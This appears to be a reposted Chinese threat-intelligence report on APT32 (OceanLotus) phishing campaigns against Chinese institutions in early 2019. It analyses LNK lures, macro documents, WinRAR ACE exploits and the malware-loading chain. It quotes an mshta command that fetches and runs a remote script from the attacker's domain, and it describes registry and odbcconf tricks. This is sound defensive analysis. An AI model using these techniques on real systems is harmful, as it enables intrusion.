首页 资讯 安全 查看内容

海莲花APT组织2019年第一季度针对中国的攻击活动技术揭秘

2019-4-26 11:40 |来自: 互联网 2146 0

摘要: 一、背景“海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动的最活跃的APT攻击组织之一。在2019年 ...
关键词: 攻击 文件 恶意 攻击者 木马 诱饵 shellcode 莲花 文档 函数

一、背景

“海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动的最活跃的APT攻击组织之一。

在2019年第一季度,腾讯御见威胁情报中心持续的检测到该组织针对中国大陆的政府、海事机构、商务部门、研究机构的攻击活动。此外该组织还在不断的更新他们的攻击武器库,无论是钓鱼的诱饵形式、payload的加载、横向移动等。尤其值得注意的是,我们发现该组织针对不同的机器下发不同的恶意模块,使得即便恶意文件被安全厂商捕捉到,也因为无相关机器特征而无法解密最终的payload,无法知晓后续的相关活动。

活动钻石模型如下:




二、技术分析

1、 初始攻击

恶意文件投递的方式依然是最常用的鱼叉攻击的方式,钓鱼关键字包括”干部培训”,”绩效”,”工作方向”,”纪检监察”等,相关的邮件如下:





除此该次攻击还新增了敏感内容的主题,用户吸引被攻击者打开,如敏感图片:



2、 诱饵类型

2019年一季度投递的恶意诱饵类型众多,包括白加黑、lnk、doc文档、带有WinRARACE(CVE-2018-20250)漏洞的压缩包等。

1) 白加黑




2) 恶意lnk



3) 带有宏的恶意doc文档



4) 带有WinRAR ACE(CVE-2018-20250)漏洞的压缩包:








3、 恶意文件植入

1) 恶意lnk分析

在1月的一波攻击中,该组织会在所有的投递的压缩包里,都存放一个恶意的lnk,但是所有的lnk文件都类似(执行的地址不能,但是内容一致)。lnk文件的图标伪装成word图标。值得注意的是,该lnk的图标会从网络获取,因此如果远程服务器已经关闭,会导致该lnk无图标的现象。此外,还会造成即便不双击lnk,只要打开lnk所在的目录,就会出现网络连接的现象。

该现象的原因是:explorer解析lnk的时候会去解析图标,而这个lnk配置的图标在网络上,因此会自动去下载,但只是下载,不会执行,看一眼不运行lnk文件的话,会泄漏自身ip地址,但不会导致电脑中木马。



双击运行lnk后,会执行下列命令:

C:WindowsSysWOW64mshta.exehttp://api.baidu-json.com/feed/news.html

其中, news.html实际为一个vbs脚本文件:



mstha执行此脚本本后会解密脚本中存储的内容,并存储到%temp%目录下,文件名分别为:

7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp
7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.exe
7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.log
7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.env



解密算法如下所示:



接着调用系统自带的odbcconf.exe,将7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp(dll文件)给加载起来。最后调用taskkill.exe,结束mshta.exe进程:



但是奇怪的是,由于解密算法的问题,导致最终的解密失败,因此执行该lnk,用户实际并不会中招:

从而我们猜测该方式可能还处于测试阶段,或者作者由于疏忽导致。不过在后续的攻击活动中,我们未再次检测到该攻击方式。

2) 带有宏的doc文档

带有宏的文档的投递,是该组织比较常用的恶意诱饵,如:

此外,Twitter上也有不少安全同仁曝光过该组织的该方式的诱饵:



此外疑似作者还在VT上跟相关研究员互动:



当然,我们更相信该用户可能只是安全研究员之间的一个玩笑。

执行宏后,首先会复制原始文档到%temp%下,命名为随机名文件:



然后解密出一个新的VBA宏:



接着设置注册表

”HKEY_CURRENT_USERSoftwareMicrosoftOffice .0WordSecurityAccessVBOM”的值为1:



最后打开之前复制的doc文件,并将原始VBA宏擦除,将解密后的新的VBA宏添加进去,并启动VBA宏函数 x_N0th1ngH3r3:



x_N0th1ngH3r3函数同样是解密出一段新VBA宏,同样调用新VBA宏的x_N0th1ngH3r3函数:



解密出来的新VBA宏目的是将shellcode解密并加载执行:



Shellcode解密出一个DLL文件,并在内存中加载,执行DllEntry函数:




本文出处: https://www.toutiao.com/a6684000320902660622/

声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部